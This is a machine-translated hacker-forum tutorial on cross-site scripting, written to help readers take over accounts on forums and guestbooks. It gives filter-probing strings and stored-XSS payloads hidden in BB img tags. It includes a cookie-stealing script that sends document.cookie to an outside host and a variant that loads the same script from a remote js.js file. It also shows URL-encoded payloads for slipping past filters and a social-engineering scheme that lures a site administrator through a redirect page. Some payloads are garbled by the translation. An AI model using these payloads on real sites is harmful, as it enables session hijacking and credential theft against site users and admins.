This page has been robot translated, sorry for typos if any. Original content here.

Xss Description from A to Z.



  • Xss is Css => Cross Site Scripting
  • How to use XSS
  • What is an XSS attack?
  • What are passive and active XSS?
  • So, I’ll go specifically to how to find XSS in this site.
  • And how to determine if there is a filter or not?
  • Active XSS
  • We kept making codes like
  • How to substitute it to the link with Xss?


  • Xss is Css => Cross Site Scripting

    Not to be confused with CSS also called XSS
    This BAG first appeared in 1997.



    How to use XSS.


    First we need to know what a cookie is.
    If you know, you can skip.

    Cookies are used to save site credentials on the visitor’s computer.
    If you registered on the site under the nickname 'blabluble', then the site saved a cookie file on your computer where your data is encoded.
    And if you have an admin and you have access to the site, and I am the user who stole your (admin) cookies, then I can safely go to the site, and the site defines me as 'admin' - I will have administrator rights.

    To change (substitute stolen) cookies, I advise you to use the CookieEdit program for IE or the built-in functions in Opera and Firefox.

    To intercept cookies, you need to find a place on the site where you can perform an XSS attack.


    What is an XSS attack?


    XSS attacks are not attacks on the site itself, but on site users.
    XSS is a flaw in the filter, application.

    There are passive XSS and active XSS.

    What are passive and active XSS?


    Passive - these are Xss that require direct participation from the victim + there are specific limitations and difficulties.
    Therefore, passive XSS are not much appreciated.
    For example, you need to make her follow a poisonous link, which will require social engineering, cunning.

    Active ones are XSSs that do not require any additional actions on the part of the victim - she just needs to open a page with your XSS and Java code will be executed automatically.
    Due to their automation, they are very useful and valuable.
    For example, active hss exist in BB tags due to insufficient filtering when you leave a message on the forum \ guestbook \ chat, which will always be active with every update.




    So, I’ll go specifically to how to find XSS in this site.


    As I wrote earlier that XSS consists of tags, they also consist of html, and javascript language =).

    Javascript can be entered in html.
    Can be encoded to bypass filters. But more on that later.

    How to find out what XSS is on a given site?
    Terrible widespread recognition of type
    <script> alert () </script> We are trying to insert this script into all the various fields ... if a message appears, the script has been processed and executed.

    The most common XSS (observed in all places where poor filtering):

    "> <script> alert () </script>

    The whole point is in "> .

    Let's think about what we do when we type in the "> <script> alert () </script> field, what happens?

    We enter into the form "> <script> alert () </script> a variable is assigned a field value. The variable is processed, "> executed, closes

    script and execute <script> alert () </script>

    This XSS is the most common in search engines:

    We look through all the fields of the site and try to insert "> <script> alert () </script>
    If a message appears - you found XSS ...




    And how to determine if there is a filter or not?


    Just enter into any field: '';! - "<#########> = & {()}
    Next, open the html page and look for the word "########"
    and see the subsequent syvols ..

    If <> it remains, then this is the first sign of vulnerability - it means the filter has a hole.
    If "'\ characters remained as they were entered - this is the second sign of vulnerability - possible additional characters for the subsequent XSS attack.
    Then, if you open HTML, you did not find <> then most likely a hole in the filter.
    If opening HTML you find that <> are replaced with other characters, then this is a bummer - filter at least
    least functioning normally.
    It is also possible to enter in the filtering check box like this: "> <> '" `, / \? @%

    Consider the case if the filter eats up <>

    In this case, there is a chance of a hole.
    For example, the filter condition is to eat <script>, <> and.
    Then try <zxcvb script: alert ();

    The filter looks that there is nothing dangerous in <IMG% 20SRC = "java script: alert (); no, closes and thereby
    executing a script.

    Of course, if the filter does not filter different encodings, then you can try to encode the script and paste the code.

    Everything must be tried by trial and error ...
    Try to enter into the fields and carefully look at what we got from the filter.
    Using the poke method to understand how the filter works, whether it has any flaws.
    If the filter is bad, we can always insert scripts.




    Active XSS


    Here you need to use the allowed tags and closing them, you must complete the request.

    For example, url, bb, img tags .
    The whole point of the insertion is that we need to embed the request in the img or url parameter. Img has many options besides src and alt.
    This bug is very often used on the forum, in guestbooks ...

    Consider active XSS.

    Warnings !!!

    The tags [fon * t], [im * g], [ur * l] are written with * so that they do not merge with the site code.
    To use these tags, remove * .

    For example, let's look at the forum for the use of the tags [fon * t], [im * g], [ur * l] and try to insert a script into them or combine them:

    [im * g] Http: //www.qwewqw.ru/1.jpg [/ im * g] A cross appears ... then img is used and we picked it up (it's just that img is turned on, and admins from creating a message, it’s removed, they say you can’t insert pictures and it can be used
    of different shapes) if there is no cross ... and the whole inscription hangs, then try again like this:
    [im * g src = httr: //www.qwewqw.ru/1.jpg]

    Well, for example, we got a cross with this:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]

    Check if the filter holds a space, add a space after the jpg extension:
    [im * g] httr: //www.qweqw.ru/1.jpg [/ im * g]
    if there is a cross, then everything is OK.

    Next, img has dynsrc and lowsrc parameters that hold javascript. For example, we try to insert:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    check, send - a message appears - it means you found the active XSS and instead of alert () you can insert any script.

    If the filter doesn’t give up, try this:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    and
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    If a cross appears from the given examples, then httr: //www.qweqw.ru/1.jpg is replaced by the sniffer address.

    There are times when jpg is disabled by the admin.




    We kept making codes like:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    But they did not bring any benefit, these are just codes for checking (testing) on ​​Xss.

    Here is the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    He already steals cookies =)




    How to substitute it to the link with Xss?


    Yes, very easy ...
    There are several options:

    - 1) do like this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where **** site with Xss.

    Here is the compiled script itself:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can still do like this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http: // haknet .h16.ru / script / js.js

    and in js.js there is:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; this method is more reliable.

    But as I already wrote - sometimes there are difficulties with filters on the site (our script does not roll).
    Then you need to think about how to get around it.
    You can simply add something, change something, or delete it in a script.
    But there is a more reliable option when we just code the script. There are many progs for this.
    There is such a site as http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    it was encoded:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Especially encryption is necessary not only for cheating filters, but also for cheating ADMIN when using PASSIVE CSX.

    Here is an example based on social engineering.
    We are looking for contact with the forum administrator, throw a link to his site in the forum, and say something like "cool feature is on the site" and so on in the same vein.
    And on our site it will be, you guessed it =) here is a script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do you ask me? )) .. this is a java code that goes to the specified site without a request. So, it turns out, we gave the link to the admin, and he went to our site, that's what is done .. he quickly throws it on

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is our Xss in encrypted form.

    Note: this will only work when Xss belongs to the admin of the site to which you left the link ...
    In other words, the DIFFICULTY of PASSIVE CSU is that the vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!